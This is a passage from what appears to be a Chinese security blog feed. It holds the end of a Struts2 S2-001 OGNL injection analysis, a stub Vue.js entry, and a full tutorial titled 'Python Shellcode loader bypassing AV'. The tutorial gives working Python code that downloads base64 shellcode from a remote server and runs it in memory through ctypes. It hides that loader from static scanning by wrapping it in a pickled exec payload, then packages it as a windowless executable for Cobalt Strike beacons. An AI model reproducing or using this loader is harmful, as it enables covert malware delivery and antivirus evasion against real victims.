<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153309872.png" alt="image-20201218153309872"></p>
<p><code>findValue</code>在开启了<code>altSyntax</code>且<code>toType</code>为<code>class.java.lang.string</code>时调用<code>TextParseUtil.translateVariables</code>方法</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153519551.png" alt="image-20201218153519551"></p>
<p>跟进该方法</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153626893.png" alt="image-20201218153626893"></p>
<p>发现该方法重名加载</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153722178.png" alt="image-20201218153722178"></p>
<p>我们传入<code>translateVariables</code> 方法的表达式 <code>expression</code> 为 <code>%{password}</code> ,经过 <code>OGNL</code>表达式解析,程序会获得其值 <code>%{1+1}</code>(这里就是我们传入的payload)。由于此处使用的是 <code>while</code>循环来解析<code>OGNL</code> ,所以获得的<code>%{1+1}</code>又会被再次循环解析,最终也就造成了任意代码执行。</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218154234294.png" alt="image-20201218154234294"></p>
<p>关键代码:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">translateVariables</span><span class="params">(<span class="keyword">char</span> open, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator)</span> </span>{</span><br><span class="line"> Object result = expression;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(<span class="keyword">true</span>) {</span><br><span class="line"> <span class="keyword">int</span> start = expression.indexOf(open + <span class="string">"{"</span>);</span><br><span class="line"> <span class="keyword">int</span> length = expression.length();</span><br><span class="line"> <span class="keyword">int</span> x = start + <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">int</span> count = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(start != -<span class="number">1</span> && x < length && count != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">char</span> c = expression.charAt(x++);</span><br><span class="line"> <span class="keyword">if</span> (c == <span class="string">'{'</span>) {</span><br><span class="line"> ++count;</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="string">'}'</span>) {</span><br><span class="line"> --count;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> end = x - <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> (start == -<span class="number">1</span> || end == -<span class="number">1</span> || count != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> String <span class="keyword">var</span> = expression.substring(start + <span class="number">2</span>, end);</span><br><span class="line"> Object o = stack.findValue(<span class="keyword">var</span>, asType);</span><br><span class="line"> <span class="keyword">if</span> (evaluator != <span class="keyword">null</span>) {</span><br><span class="line"> o = evaluator.evaluate(o);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> String left = expression.substring(<span class="number">0</span>, start);</span><br><span class="line"> String right = expression.substring(end + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span> (o != <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (TextUtils.stringSet(left)) {</span><br><span class="line"> result = left + o;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> result = o;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (TextUtils.stringSet(right)) {</span><br><span class="line"> result = result + right;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> expression = left + o + right;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> result = left + right;</span><br><span class="line"> expression = left + right;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>因此究其原因,在于在<code>translateVariables</code>中,递归解析了表达式,在处理完<code>%{password}</code>后将<code>password</code>的值直接取出并继续在<code>while</code>循环中解析,若用户输入的<code>password</code>是恶意的<code>OGNL</code>表达式,比如<code>%{1+1}</code>,则得以解析执行。</p>
<p>POC:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">%{<span class="number">1</span>+<span class="number">1</span>}</span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>增加了了递归解析的判断</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224171538096.png" alt="image-20201224171538096"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://xz.aliyun.com/t/7915" target="_blank" rel="noopener">https://xz.aliyun.com/t/7915</a></p>
<p><a href="https://xz.aliyun.com/t/2044" target="_blank" rel="noopener">https://xz.aliyun.com/t/2044</a></p>
<p><a href="https://dean2021.github.io/posts/s2-001/" target="_blank" rel="noopener">https://dean2021.github.io/posts/s2-001/</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-001" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Vue.js 学习笔记</title>
<url>/2020/12/14/Vue.js/</url>
<content><![CDATA[<iframe id="embed_dom" name="embed_dom" frameborder="0" style="display:block;width:100%; height:600px;" src="https://www.processon.com/view/link/5fd6d7185653bb06f33b70d6"></iframe>
<a id="more"></a>
<p>PNG格式</p>
<p><a href="http://assets.processon.com/chart_image/5fcf37041e085306e0e6c8b1.png" target="_blank" rel="noopener">http://assets.processon.com/chart_image/5fcf37041e085306e0e6c8b1.png</a></p>
]]></content>
<tags>
<tag>Vue</tag>
</tags>
</entry>
<entry>
<title>Python Shellcode加载器绕过AV</title>
<url>/2020/12/07/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/</url>
<content><![CDATA[<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><figure class="highlight asciidoc"><table><tr><td class="code"><pre><span class="line">免杀技术大致分为有以下几类:</span><br><span class="line">特征码修改</span><br><span class="line">花指令免杀</span><br><span class="line">加壳免杀</span><br><span class="line">内存免杀</span><br><span class="line">二次编译</span><br><span class="line">分离免杀</span><br><span class="line">资源修改</span><br><span class="line">...</span><br><span class="line">Ps: 不管使用哪种技术,能绕过AV(AntiVirus)达到效果的,都是好的。</span><br></pre></td></tr></table></figure>
<p>采用分离免杀,即利用ShellCode和Python制作的加载器进行分离。</p>
<p>主要将ShellCode进行编码,分离及反序列化达到bypass的思路和方法。</p>
<a id="more"></a>
<h4 id="ShellCode"><a href="#ShellCode" class="headerlink" title="ShellCode"></a>ShellCode</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line">什么是<span class="keyword">ShellCode?</span></span><br><span class="line"><span class="keyword">答:一段用于利用软件漏洞而执行的代码</span></span><br></pre></td></tr></table></figure>
<p>这里我们利用Cobalt Strike生成的ShellCode</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205145223046.png" alt="image-20201205145223046"></p>
<h4 id="ShellCode加载器"><a href="#ShellCode加载器" class="headerlink" title="ShellCode加载器"></a>ShellCode加载器</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line">什么是<span class="keyword">ShellCode加载器?</span></span><br><span class="line"><span class="keyword">答:即专门用于加载所提供ShellCode的工具。</span></span><br></pre></td></tr></table></figure>
<p>以Python为例:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line"><span class="comment"># "msfvenom -p windows/x64/exec CMD=calc.exe -f python"生成的计算器的ShellCode</span></span><br><span class="line">shellcode = <span class="string">b"\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]H\xba\x01\x00\x00\x00\x00\x00\x00\x00H\x8d\x8d\x01\x01\x00\x00A\xba1\x8bo\x87\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5calc.exe\x00"</span></span><br><span class="line"> </span><br><span class="line">shellcode = bytearray(shellcode)</span><br><span class="line"><span class="comment"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line"><span class="comment"># 申请内存</span></span><br><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="number">0</span>), ctypes.c_int(len(shellcode)), ctypes.c_int(<span class="number">0x3000</span>), ctypes.c_int(<span class="number">0x40</span>))</span><br><span class="line"> </span><br><span class="line"><span class="comment"># 放入shellcode</span></span><br><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> buf, </span><br><span class="line"> ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.pointer(ctypes.c_int(<span class="number">0</span>))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 等待上面创建的线程运行完</span></span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(<span class="number">-1</span>))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204183555152.png" alt="image-20201204183555152"></p>
<h4 id="分离"><a href="#分离" class="headerlink" title="分离"></a>分离</h4><p>这里通过本地请求Http Server获取ShellCode内容并进行加载执行。</p>
<p>将ShellCode放置VPS上,这里利用Python起一个临时的http服务。</p>
<figure class="highlight axapta"><table><tr><td class="code"><pre><span class="line">python3 -m http.<span class="keyword">server</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204181858175.png" alt="image-20201204181858175"></p>
<p>通过request请求来获取ShellCode进行加载执行从而实现分离。</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">shellcode</span> = urllib.request.urlopen(<span class="string">'http://192.168.1.1:8000/test.txt'</span>).read()</span><br></pre></td></tr></table></figure>
<h4 id="编码"><a href="#编码" class="headerlink" title="编码"></a>编码</h4><p>我么可以对ShellCode进行混淆编码加密等,再有本地可执行程序进行解密执行,这里我们以Base64编码处理为例,处理过后ShellCode页面如下。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204182834063.png" alt="image-20201204182834063"></p>
<h4 id="下载ShellCode并执行"><a href="#下载ShellCode并执行" class="headerlink" title="下载ShellCode并执行"></a>下载ShellCode并执行</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64</span><br><span class="line"></span><br><span class="line">shellcode = urllib.request.urlopen(<span class="string">'http://192.168.1.1:8000/test.txt'</span>).read() <span class="comment"># 请求pyload(base64格式)</span></span><br><span class="line">shellcode = base64.b64decode(shellcode) <span class="comment"># base64解密</span></span><br><span class="line">shellcode =codecs.escape_decode(shellcode)[<span class="number">0</span>] <span class="comment"># </span></span><br><span class="line">shellcode = bytearray(shellcode) <span class="comment"># 返回新字节数组</span></span><br><span class="line"><span class="comment"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line"><span class="comment"># 申请内存</span></span><br><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="number">0</span>), ctypes.c_int(len(shellcode)), ctypes.c_int(<span class="number">0x3000</span>), ctypes.c_int(<span class="number">0x40</span>))</span><br><span class="line"> </span><br><span class="line"><span class="comment"># 放入shellcode</span></span><br><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> buf, </span><br><span class="line"> ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.pointer(ctypes.c_int(<span class="number">0</span>))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 等待上面创建的线程运行完</span></span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(<span class="number">-1</span>))</span><br></pre></td></tr></table></figure>
<h4 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h4><p>经过了上文的那些操作,使用<code>pyinstaller</code>将我们的程序打包成可执行程序,仍然会给杀软进行查杀。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205105822973.png" alt="image-20201205105822973"></p>
<p>因为我们使用的加载器本身关键语句已经被检测,因此我们需要对其进行进一步处理从而绕过静态查杀,我们绕过的方式可以通过上文说过的混淆、编码、加密等方式对代码进行处理,然后进行调用执行。但是像执行命令的<code>exec</code>、<code>eval</code>等函数特征比较明显,所以我们对它也需要进一步处理。</p>
<p>跟其他语言一样,Python也有序列化的功能,官方库里提供了pickle/cPickle的库用于序列化和反序列化,可以序列化python的任何数据结构,包括一个类,一个对象。</p>
<p>Python反序列化中 ,有几个内置方法会在对象反序列化时调用,这一点和PHP中的<code>__wakeup()</code>魔术方法类似,都是因为每当反序列化过程开始或者结束时 , 都会自动调用这类函数。(这一点可以去了解一下:python中的反序列化安全问题)</p>
<figure class="highlight gcode"><table><tr><td class="code"><pre><span class="line">__reduce__<span class="comment">()</span> </span><br><span class="line">__reduce_ex__<span class="comment">()</span> </span><br><span class="line">__setstate__<span class="comment">()</span></span><br><span class="line">可参考官方文档:https:<span class="comment">//docs.python.org/zh-cn/dev/library/pickle.html</span></span><br></pre></td></tr></table></figure>
<p>以<code>__reduce__()</code>为例:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> a = <span class="number">1</span></span><br><span class="line"> b = <span class="number">2</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">print</span>, (self.a+self.b,))</span><br><span class="line"></span><br><span class="line">serialize = pickle.dumps(A()) <span class="comment"># 序列化</span></span><br><span class="line">print(serialize)</span><br><span class="line"></span><br><span class="line">unserialize = pickle.loads(serialize) <span class="comment"># 反序列化</span></span><br></pre></td></tr></table></figure>
<p>通过<code>pickle</code>的<code>loads</code>来反序列化并自动执行了</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204233028982.png" alt="image-20201204233028982"></p>
<p>从输出的结果我们还是可以看到调用的关键函数名称,可以对其进行混淆、编码、加密等操作,这里以<code>Base64</code>编码为例,序列化、编码,解码、反序列化代码如下:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> a = <span class="number">1</span></span><br><span class="line"> b = <span class="number">2</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">print</span>, (self.a+self.b,))</span><br><span class="line"></span><br><span class="line">serialize = pickle.dumps(A()) <span class="comment"># 序列化</span></span><br><span class="line">print(serialize)</span><br><span class="line">print(<span class="string">"========分割线==========="</span>)</span><br><span class="line">serialize_encode = base64.b64encode(serialize) <span class="comment">#进行base64编码</span></span><br><span class="line">print(serialize_encode)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155425112.png" alt="image-20201205155425112"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">serialize_encode = <span class="string">b'gASVHAAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5RLA4WUUpQu'</span></span><br><span class="line">serialize_decode = base64.b64decode(serialize_encode)</span><br><span class="line">unserialize = pickle.loads(serialize_decode) <span class="comment"># 反序列化</span></span><br></pre></td></tr></table></figure>
<p>从代码层面来看,看到的是一段正常的base64编码以及反序列化的脚本文件,达到bypass的效果。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155553287.png" alt="image-20201205155553287"></p>
<h4 id="反序列化应用"><a href="#反序列化应用" class="headerlink" title="反序列化应用"></a>反序列化应用</h4><p>结合上述说的利用反序列化来进行对我们的ShellCode加载来处理:</p>
<p>先进行序列化操作并进行base64编码,得到base64编码后的序列化:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64,pickle</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">"""</span></span><br><span class="line"><span class="string">shellcode = urllib.request.urlopen('http://192.168.1.1:8000/test.txt').read() # 请求pyload(base64格式)</span></span><br><span class="line"><span class="string">shellcode = base64.b64decode(shellcode) # base64解密</span></span><br><span class="line"><span class="string">shellcode =codecs.escape_decode(shellcode)[0] # </span></span><br><span class="line"><span class="string">shellcode = bytearray(shellcode) # 返回新字节数组</span></span><br><span class="line"><span class="string"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span></span><br><span class="line"><span class="string"># 申请内存</span></span><br><span class="line"><span class="string">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"># 放入shellcode</span></span><br><span class="line"><span class="string">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.RtlMoveMemory(</span></span><br><span class="line"><span class="string"> ctypes.c_uint64(ptr), </span></span><br><span class="line"><span class="string"> buf, </span></span><br><span class="line"><span class="string"> ctypes.c_int(len(shellcode))</span></span><br><span class="line"><span class="string">)</span></span><br><span class="line"><span class="string"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line"><span class="string">handle = ctypes.windll.kernel32.CreateThread(</span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_uint64(ptr), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.pointer(ctypes.c_int(0))</span></span><br><span class="line"><span class="string">)</span></span><br><span class="line"><span class="string"># 等待上面创建的线程运行完</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span>(<span class="keyword">exec</span>,(shellcode,))</span><br><span class="line"></span><br><span class="line"><span class="comment">#序列化、编码</span></span><br><span class="line">ret = pickle.dumps(A())</span><br><span class="line">ret_base64 = base64.b64encode(ret)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-202012051534357041.png" alt="image-20201205153435704"></p>
<p>再进行base64解码、反序列化操作,执行脚本,正常上线。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64,pickle</span><br><span class="line"><span class="comment">#解码、反序列化</span></span><br><span class="line">ret_base64 = <span class="string">b"gASVKwQAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFgMBAAACnNoZWxsY29kZSA9IHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly84MS42OC4yMzUuMjE5OjgwMDAvdGVzdC50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5j........"</span> </span><br><span class="line">pickle.loads(base64.b64decode(ret_base64))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154002722.png" alt="image-20201205154002722"></p>
<h4 id="生成可执行文件"><a href="#生成可执行文件" class="headerlink" title="生成可执行文件"></a>生成可执行文件</h4><h5 id="pyinstaller"><a href="#pyinstaller" class="headerlink" title="pyinstaller"></a>pyinstaller</h5><figure class="highlight dsconfig"><table><tr><td class="code"><pre><span class="line"><span class="string">pyinstaller </span><span class="built_in">--noconsole</span> <span class="built_in">--onefile</span> <span class="string">demo1.</span><span class="string">py </span>-i <span class="string">favicon.</span><span class="string">ico </span>-n <span class="string">demo1 </span></span><br><span class="line"></span><br><span class="line"><span class="built_in">--onefile</span> 打包一个单个文件</span><br><span class="line"><span class="built_in">--noconsole</span> 使用<span class="string">Windows子</span>系统执行.当程序启动的时候不会打开命令行(只对<span class="string">Windows有</span>效)</span><br><span class="line">-i 设置生成执行文件的图标</span><br><span class="line">-n 设置生成执行文件的名字</span><br><span class="line"><span class="comment"># pyinstaller参数可参考:https://pyinstaller.readthedocs.io/en/v3.3.1/usage.html</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154952238.png" alt="image-20201205154952238"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154735442.png" alt="image-20201205154735442"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155120792.png" alt="image-20201205155120792"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205224811833.png" alt="image-20201205224811833"></p>
<p>部分AV对<code>Pyinstaller</code>打包的程序检测较为敏感,即使是仅打包<code>print(1)</code>这种代码都有类似的结果</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207153229920.png" alt="image-20201207153229920"></p>
<h5 id="py2exe"><a href="#py2exe" class="headerlink" title="py2exe"></a>py2exe</h5><figure class="highlight css"><table><tr><td class="code"><pre><span class="line"><span class="selector-tag">python</span> <span class="selector-tag">setup</span><span class="selector-class">.py</span> <span class="selector-tag">py2exe</span></span><br><span class="line">注: <span class="selector-tag">py2exe</span>为0<span class="selector-class">.10</span><span class="selector-class">.1</span><span class="selector-class">.0</span>版本,亲测<span class="selector-tag">python3</span><span class="selector-class">.6</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.4</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.9</span>可生成可执行文件并正常打开,<span class="selector-tag">python3</span><span class="selector-class">.8</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.8</span><span class="selector-class">.2</span>、<span class="selector-tag">python3</span><span class="selector-class">.9</span><span class="selector-class">.0</span> 生成执行文件无法正常使用。</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># setup.py 用于py2exe打包</span></span><br><span class="line"><span class="keyword">from</span> distutils.core <span class="keyword">import</span> setup</span><br><span class="line"><span class="keyword">import</span> py2exe</span><br><span class="line">setup(</span><br><span class="line"> options={</span><br><span class="line"> <span class="string">'py2exe'</span>: {</span><br><span class="line"> <span class="string">'optimize'</span>: <span class="number">2</span>, <span class="comment"># 优化级别最高,</span></span><br><span class="line"> <span class="string">'bundle_files'</span>: <span class="number">1</span>, <span class="comment"># 将生成的调用文件打包进exe文件</span></span><br><span class="line"> <span class="string">'compressed'</span>: <span class="number">1</span>, <span class="comment"># 压缩</span></span><br><span class="line"> },</span><br><span class="line"> },</span><br><span class="line"> windows=[{<span class="string">"script"</span>: <span class="string">"demo2.py"</span>, <span class="comment">#需要打包的程序的文件路径,windows->GUI exe的脚本列表,console-> 控制台exe的脚本列表</span></span><br><span class="line"> <span class="string">"icon_resources"</span>: [(<span class="number">1</span>, <span class="string">"favicon.ico"</span>)]}], <span class="comment"># 程序的图标的图片路径</span></span><br><span class="line"> zipfile=<span class="literal">None</span>, <span class="comment"># 不生成library.zip文件,则捆绑在可执行文件中</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207144921636.png" alt="image-20201207144921636"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207163850250.png" alt="image-20201207163850250"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207150048052.png" alt="image-20201207150048052"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207150125561.png" alt="image-20201207150125561"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.cnblogs.com/Akkuman/p/11851057.html" target="_blank" rel="noopener">https://www.cnblogs.com/Akkuman/p/11851057.html</a></p>
